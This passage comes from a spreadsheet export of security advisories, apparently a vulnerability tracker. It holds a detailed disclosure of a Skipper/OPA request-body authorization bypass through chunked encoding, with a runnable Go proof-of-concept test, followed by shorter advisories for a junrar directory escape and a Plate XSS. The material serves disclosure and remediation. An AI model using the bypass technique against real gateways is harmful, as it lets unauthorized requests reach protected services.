7. Skipper forwards the request; `bufferedBodyReader.Read` serves the buffered prefix and then continues reading the original `req.Body`, delivering the **full oversized payload** to the upstream.
Every guard on the path is accounted for: the only "guard" is `truncated_body`, and it is defeated by omitting `content-length`.
## Impact
Bypass of OPA request-body authorization for any deployment that adopted the official `truncated_body` mitigation. Requests that the policy is meant to reject (oversized / un-inspectable bodies, or bodies whose forbidden content lies beyond the inspection window) are authorized and forwarded in full to the protected upstream. Same security property and severity class as CVE-2026-50197 / GHSA-8qqm (both High).
## CVSS 3.1
Vector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N` = **7.5 High**
- **AV:N** — remote HTTP request.
- **AC:L** — single crafted request; no race/special conditions (just chunked framing + padding).
- **PR:N / UI:N** — unauthenticated, no user interaction.
- **S:U** — impact within the authorized component/upstream trust scope.
- **C:N** — no direct disclosure by the bypass itself.
- **I:H** — authorization control is bypassed; forbidden request content reaches the upstream (integrity of the access-control decision / protected resource).
- **A:N** — not primarily an availability issue.
(Conditional: exploitable only where `opaAuthorizeRequestWithBody` is used with a `truncated_body`-gated policy — i.e. deployments that followed the GHSA-8qqm mitigation. Consistent with the conditional nature of the parent CVEs.)
## Proof of Concept
Executable Go test added to the OPA filter package. It stands up a real Skipper proxy (`proxy.WithParams`) + a real OPA control plane (`opasdktest`) with `WithMaxRequestBodyBytes(32)` and the advisory's verbatim mitigation policy (`allow if input.truncated_body == false`), routed to a recording upstream.
- **Positive control** — oversized body **with Content-Length** → `truncated_body=true` → **403** (mitigation works).
- **Bypass** — identical oversized body sent **chunked** (no Content-Length) → `truncated_body=false` → **200**, and the upstream receives the **full** 66-byte payload past the 32-byte inspection cap.
Command and observed benign output:
```
$ go test ./filters/openpolicyagent/ -run TestTruncatedBodyChunkedBypass -count=1 -v
    poc_truncated_body_chunked_test.go:148: [content-length ] status=403 upstream_body_bytes=-1
    poc_truncated_body_chunked_test.go:154: [chunked        ] status=200 upstream_body_bytes=66
--- PASS: TestTruncatedBodyChunkedBypass (0.11s)
PASS
```
- content-length variant → **403**, upstream received nothing (`-1`) — mitigation works.
- chunked variant (byte-identical body) → **200**, upstream received the **full 66-byte** payload past the 32-byte cap — **authorization bypass**.
(Full PoC source is appended below by the submission tool via `--poc-file`.)
## Adversarial re-read (refutation attempts)
- *"Truncated JSON just fails to parse → fail closed."* True for `application/json` when truncation lands mid-token, but the bypass does not rely on JSON: `application/x-www-form-urlencoded` parses leniently after truncation, and unparsed/absent content-types return `(nil, false, nil)` with no error. The load-bearing signal is `truncated_body`, not `parsed_body`, and it is `false` in all these cases.
- *"Maybe Skipper adds a content-length for chunked before OPA sees it."* No — `AdaptToExtAuthRequest` copies `req.Header` verbatim (lowercased); a chunked request has no `content-length` header, and net/http does not synthesise one. Confirmed by reading `skipperadapter.go`.
- *"Maybe the mitigation is `deny if truncated_body == true` (allow-by-default), which is unaffected."* Both shapes in the advisory rely on `truncated_body` correctly reflecting truncation; the deny-if shape simply *fails to deny* under the same chunked condition. The allow-if shape (shown) fails open directly.
- *"Is this already covered by CVE-2026-50197?"* No. 50197 was the *empty-body* chunked bypass (OPA saw no body); its fix makes OPA see the truncated prefix. GHSA-8qqm was the declared-Content-Length oversized variant; its fix populates `parsed_body` and recommends `truncated_body`. Neither addresses `truncated_body` being unset for chunked/HTTP-2 oversized bodies. The 8qqm positive-control test only used small chunked bodies.
Result: survives refutation; concrete, reproducible bypass of the published mitigation. Differentiation check passes (incomplete-fix of a published advisory, not a generic surface bug).
## Remediation
Do not rely on the client-supplied `content-length` header to detect truncation. Skipper should signal truncation authoritatively to OPA rather than delegating to the plugin's Content-Length heuristic. Concretely, in `ExtractHttpBodyOptionally`, detect that the underlying body still has bytes after `maxBodyBytes` were buffered (e.g. attempt one more read / peek) and propagate a definitive truncation indicator — for example by setting a synthetic `content-length` (or a dedicated context extension / metadata field) that reflects the real truncation state, so `input.truncated_body` is `true` whenever the body was actually cut, regardless of transfer encoding. Alternatively, reject (413) requests whose body exceeds `maxBodyBytes` when body-based authorization is enabled, instead of silently truncating. Upstream, `opa-envoy-plugin` should treat "body present but not fully inspectable and no content-length" as truncated rather than defaulting to `false`.
## Confidence
High. Root cause verified in both Skipper and the pinned `opa-envoy-plugin@v1.14.1-envoy` source; executable PoC demonstrates the status/upstream-body divergence against the maintainer's own recommended mitigation.
## Proof-of-Concept source (`poc_truncated_body_chunked_test.go`)
```go
package openpolicyagent_test
import (
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"strings"
	"sync/atomic"
	"testing"
	"time"
	opasdktest "github.com/open-policy-agent/opa/v1/sdk/test"
	"github.com/stretchr/testify/assert"
	"github.com/zalando/skipper/eskip"
	"github.com/zalando/skipper/filters"
	"github.com/zalando/skipper/filters/builtin"
	"github.com/zalando/skipper/filters/openpolicyagent"
	"github.com/zalando/skipper/filters/openpolicyagent/opaauthorizerequest"
	"github.com/zalando/skipper/proxy"
	"github.com/zalando/skipper/routing"
	"github.com/zalando/skipper/routing/testdataclient"
)
// TestTruncatedBodyChunkedBypass demonstrates that the GHSA-8qqm-fp2q-v734
// mitigation ("check input.truncated_body in your policy") fails OPEN when the
// oversized request is sent with Transfer-Encoding: chunked (no Content-Length).
//
// The mitigation Rego (verbatim from the advisory):
//
//	default allow := false
//	allow if { input.truncated_body == false }
//
// truncated_body is derived by the OPA envoy plugin ONLY when a content-length
// header is present (opa-envoy-plugin envoyauth/request.go getParsedBody -&gt;
// checkIfHTTPBodyTruncated). A chunked / HTTP-2 request carries no
// content-length, so truncated_body stays false even though Skipper truncated
// the body to max-request-body-size. The mitigated policy therefore ALLOWS an
// oversized body and the full payload reaches upstream.
func TestTruncatedBodyChunkedBypass(t *testing.T) {
	const maxBody = 32
	// oversized url-encoded payload: "a=" + 64 * "A" = 66 bytes &gt; 32.
	payload := "a=" + strings.Repeat("A", 64)
	// upstream records how many body bytes it actually received.
	var upstreamBytes atomic.Int64
	backend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		n, _ := io.Copy(io.Discard, r.Body)
		upstreamBytes.Store(n)
		w.WriteHeader(200)
		w.Write([]byte("OK"))
	}))
	defer backend.Close()
	bundleName := "test-bundle"
	opaControlPlane := opasdktest.MustNewServer(
		opasdktest.MockBundle("/bundles/"+bundleName, map[string]string{
			// The exact mitigation the advisory recommends.
			"main.rego": `
package envoy.authz
import rego.v1
default allow := false
allow if {
    input.truncated_body == false
}
`,
		}),
	)
	defer opaControlPlane.Stop()
	config := fmt.Appendf(nil, `{
		"services": {"test": {"url": %q}},
		"bundles": {"test": {"resource": "/bundles/{{ .bundlename }}"}},
		"labels": {"environment": "test"},
		"plugins": {"envoy_ext_authz_grpc": {"path": "envoy/authz/allow", "dry-run": false}}
	}`, opaControlPlane.URL())
	opaRegistry, err := openpolicyagent.NewOpenPolicyAgentRegistry(
		openpolicyagent.WithPreloadingEnabled(true),
		openpolicyagent.WithEnableDataPreProcessingOptimization(true),
		openpolicyagent.WithInstanceStartupTimeout(5*time.Second),
		openpolicyagent.WithMaxRequestBodyBytes(maxBody),
		openpolicyagent.WithOpenPolicyAgentInstanceConfig(
			openpolicyagent.WithConfigTemplate(config)),
	)
	if err != nil {
		t.Fatalf("opaRegistry: %v", err)
	}
	defer opaRegistry.Close()
	fr := make(filters.Registry)
	fr.Register(opaauthorizerequest.NewOpaAuthorizeRequestWithBodySpec(opaRegistry))
	fr.Register(builtin.NewSetPath())
	docFmt := `r1: * -&gt; opaAuthorizeRequestWithBody("%s") -&gt; "%s";`
	r := eskip.MustParse(fmt.Sprintf(docFmt, bundleName, backend.URL))
	dc := testdataclient.New(r)
	defer dc.Close()
	rt := routing.New(routing.Options{
		FilterRegistry:  fr,
		DataClients:     []routing.DataClient{dc},
		PreProcessors:   []routing.PreProcessor{opaRegistry.NewPreProcessor()},
		PostProcessors:  []routing.PostProcessor{opaRegistry},
		PollTimeout:     time.Second,
		SignalFirstLoad: true,
	})
	defer rt.Close()
	&lt;-rt.FirstLoad()
	pr := proxy.WithParams(proxy.Params{Routing: rt})
	defer pr.Close()
	ts := httptest.NewServer(pr)
	defer ts.Close()
	inst, err := opaRegistry.GetOrStartInstance(bundleName)
	assert.NoError(t, err)
	assert.NotNil(t, inst)
	doReq := func(chunked bool) (int, int64) {
		upstreamBytes.Store(-1)
		req, err := http.NewRequest("POST", ts.URL, strings.NewReader(payload))
		if err != nil {
			t.Fatalf("new request: %v", err)
		}
		req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
		if chunked {
			// Force chunked framing: no Content-Length reaches the server,
			// so the server sees req.ContentLength == -1.
			req.ContentLength = -1
			req.TransferEncoding = []string{"chunked"}
		}
		rsp, err := ts.Client().Do(req)
		if err != nil {
			t.Fatalf("do: %v", err)
		}
		io.Copy(io.Discard, rsp.Body)
		rsp.Body.Close()
		return rsp.StatusCode, upstreamBytes.Load()
	}
	// POSITIVE CONTROL: oversized body WITH Content-Length.
	// truncated_body == true  -&gt; policy denies. Mitigation works as designed.
	clStatus, clUpstream := doReq(false)
	t.Logf("[content-length ] status=%d upstream_body_bytes=%d", clStatus, clUpstream)
	assert.Equal(t, 403, clStatus, "oversized body with Content-Length must be DENIED (mitigation working)")
	// BYPASS: identical oversized body sent CHUNKED (no Content-Length).
	// truncated_body == false -&gt; policy ALLOWS -&gt; full payload reaches upstream.
	chStatus, chUpstream := doReq(true)
	t.Logf("[chunked        ] status=%d upstream_body_bytes=%d", chStatus, chUpstream)
	assert.Equal(t, 200, chStatus, "BYPASS: oversized chunked body was ALLOWED by the truncated_body mitigation")
	assert.Equal(t, int64(len(payload)), chUpstream,
		"BYPASS: upstream received the FULL oversized payload past OPA authorization")
}
```</t>
        </is>
      </c>
      <c r="T1101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86043</t>
        </is>
      </c>
    </row>
    <row r="1102">
      <c r="A1102" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1102" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86071</t>
        </is>
      </c>
      <c r="D1102" s="5" t="inlineStr"/>
      <c r="E1102" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1102" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1102" s="5" t="inlineStr"/>
      <c r="H1102" s="5" t="inlineStr"/>
      <c r="I1102" s="5" t="inlineStr"/>
      <c r="J1102" s="5" t="inlineStr"/>
      <c r="K1102" s="5" t="inlineStr"/>
      <c r="L1102" s="5" t="inlineStr">
        <is>
          <t>maven:com.github.junrar:junrar</t>
        </is>
      </c>
      <c r="M1102" s="5" t="inlineStr">
        <is>
          <t>7.6.1</t>
        </is>
      </c>
      <c r="N1102" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1102" s="5" t="inlineStr"/>
      <c r="P1102" s="5" t="inlineStr"/>
      <c r="Q1102" s="5" t="inlineStr"/>
      <c r="R1102" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S1102" s="5" t="inlineStr">
        <is>
          <t>## Summary
`LocalFolderExtractor` validates only the final canonical file path before extraction. However, `makeFile()` creates intermediate directories one path segment at a time without checking whether each created directory remains inside the destination folder.
A malicious RAR entry can make the final file path resolve inside the extraction destination, while causing intermediate `mkdir()` calls to create attacker-chosen directories outside the extraction root.
This is an extraction root escape via unchecked intermediate directory creation. The default impact is directory creation outside the intended destination, not unconditional arbitrary file content write.
## Affected Code
- `src/main/java/com/github/junrar/LocalFolderExtractor.java`
  - `createFile()` checks only the final canonical path.
  - `makeFile()` calls `dir.mkdir()` for each intermediate segment without containment checks.
Relevant code flow:
```java
private File createFile(final FileHeader fh, final File destination) throws IOException {
    String name = invariantSeparatorsPathString(fh.getFileName());
    File f = new File(destination, name);
    String dirCanonPath = f.getCanonicalPath();
    if (!dirCanonPath.startsWith(destination.getCanonicalPath() + File.separator)) {
        throw new IllegalStateException(...);
    }
    if (!f.exists()) {
        f = makeFile(destination, name);
    }
    return f;
}
private File makeFile(final File destination, final String name) throws IOException {
    final String[] dirs = name.split("/");
    String path = "";
    for (int i = 0; i &lt; dirs.length - 1; i++) {
        path = path + File.separator + dirs[i];
        File dir = new File(destination, path);
        dir.mkdir();
    }
    path = path + File.separator + dirs[dirs.length - 1];
    final File f = new File(destination, path);
    f.createNewFile();
    return f;
}
```
## Impact
An attacker who can supply a malicious RAR archive can create directories outside the intended extraction directory.
This violates the expected extraction boundary and can be used for filesystem pollution or file-vs-directory squatting. For example, an attacker can create a directory at a path where a later security-sensitive file is expected, causing future writes to that path to fail.</t>
        </is>
      </c>
      <c r="T1102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86071</t>
        </is>
      </c>
    </row>
    <row r="1103">
      <c r="A1103" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1103" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88976</t>
        </is>
      </c>
      <c r="D1103" s="5" t="inlineStr"/>
      <c r="E1103" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F1103" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1103" s="5" t="inlineStr"/>
      <c r="H1103" s="5" t="inlineStr"/>
      <c r="I1103" s="5" t="inlineStr"/>
      <c r="J1103" s="5" t="inlineStr"/>
      <c r="K1103" s="5" t="inlineStr"/>
      <c r="L1103" s="5" t="inlineStr">
        <is>
          <t>npm:@platejs/core</t>
        </is>
      </c>
      <c r="M1103" s="5" t="inlineStr">
        <is>
          <t>53.3.11</t>
        </is>
      </c>
      <c r="N1103" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1103" s="5" t="inlineStr"/>
      <c r="P1103" s="5" t="inlineStr"/>
      <c r="Q1103" s="5" t="inlineStr"/>
      <c r="R1103" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S1103" s="5" t="inlineStr">
        <is>
          <t>### Summary
HTML strings passed to Plate's core deserialization APIs were parsed in the active document. Certain HTML attributes could therefore trigger browser behavior during parsing, before the content was converted into editor nodes.
Applications that deserialize HTML from untrusted or cross-user sources may be affected.
### Impact
An attacker who can control HTML later deserialized in another user's browser may be able to execute script in that application's origin.
### Remediation
Upgrade to `@platejs/core` 53.3.11 or later. Users of the discontinued 54.0.0 beta builds should install the fixed stable line. Applications should also sanitize untrusted HTML before rendering it; inert parsing is not a substitute for sanitization.</t>
        </is>
      </c>
      <c r="T1103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88976</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T1103"/>
  <conditionalFormatting sqref="E2:E110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10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 xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T868" r:id="rId867"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T869" r:id="rId868"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T870" r:id="rId869"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T871" r:id="rId870"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T872" r:id="rId871"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T873" r:id="rId872"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T874" r:id="rId873"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T875" r:id="rId874"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T876" r:id="rId875"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T877" r:id="rId876"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T878" r:id="rId877"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T879" r:id="rId878"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T880" r:id="rId879"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T881" r:id="rId880"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T882" r:id="rId881"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T883" r:id="rId882"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T884" r:id="rId883"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T885" r:id="rId884"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T886" r:id="rId885"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T887" r:id="rId886"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T888" r:id="rId887"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T889" r:id="rId888"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T890" r:id="rId889"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T891" r:id="rId890"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T892" r:id="rId891"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T893" r:id="rId892"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T894" r:id="rId893"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T895" r:id="rId894"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T896" r:id="rId895"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T897" r:id="rId896"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T898" r:id="rId897"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T899" r:id="rId898"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T900" r:id="rId899"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T901" r:id="rId900"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T902" r:id="rId901"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T903" r:id="rId902"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T904" r:id="rId903"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T905" r:id="rId904"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T906" r:id="rId905"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T907" r:id="rId906"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T908" r:id="rId907"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T909" r:id="rId908"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T910" r:id="rId909"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T911" r:id="rId910"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T912" r:id="rId911"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T913" r:id="rId912"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T914" r:id="rId913"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T915" r:id="rId914"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T916" r:id="rId915"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T917" r:id="rId916"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T918" r:id="rId917"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T919" r:id="rId918"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T920" r:id="rId919"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T921" r:id="rId920"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T922" r:id="rId921"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T923" r:id="rId922"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T924" r:id="rId923"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T925" r:id="rId924"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T926" r:id="rId925"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T927" r:id="rId926"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T928" r:id="rId927"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T929" r:id="rId928"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T930" r:id="rId929"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T931" r:id="rId930"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T932" r:id="rId931"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T933" r:id="rId932"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T934" r:id="rId933"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T935" r:id="rId934"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T936" r:id="rId935"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T937" r:id="rId936"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T938" r:id="rId937"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T939" r:id="rId938"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T940" r:id="rId939"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T941" r:id="rId940"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T942" r:id="rId941"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T943" r:id="rId942"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T944" r:id="rId943"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T945" r:id="rId944"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T946" r:id="rId945"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T947" r:id="rId946"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T948" r:id="rId947"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T949" r:id="rId948"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T950" r:id="rId949"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T951" r:id="rId950"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T952" r:id="rId951"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T953" r:id="rId952"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T954" r:id="rId953"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T955" r:id="rId954"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T956" r:id="rId955"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T957" r:id="rId956"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T958" r:id="rId957"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T959" r:id="rId958"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T960" r:id="rId959"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T961" r:id="rId960"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T962" r:id="rId961"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T963" r:id="rId962"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T964" r:id="rId963"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T965" r:id="rId964"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T966" r:id="rId965"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T967" r:id="rId966"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T968" r:id="rId967"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T969" r:id="rId968"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T970" r:id="rId969"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T971" r:id="rId970"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T972" r:id="rId971"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T973" r:id="rId972"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T974" r:id="rId973"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T975" r:id="rId974"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T976" r:id="rId975"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T977" r:id="rId976"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T978" r:id="rId977"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T979" r:id="rId978"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T980" r:id="rId979"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T981" r:id="rId980"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T982" r:id="rId981"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T983" r:id="rId982"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T984" r:id="rId983"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T985" r:id="rId984"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T986" r:id="rId985"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T987" r:id="rId986"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T988" r:id="rId987"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T989" r:id="rId988"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T990" r:id="rId989"/>
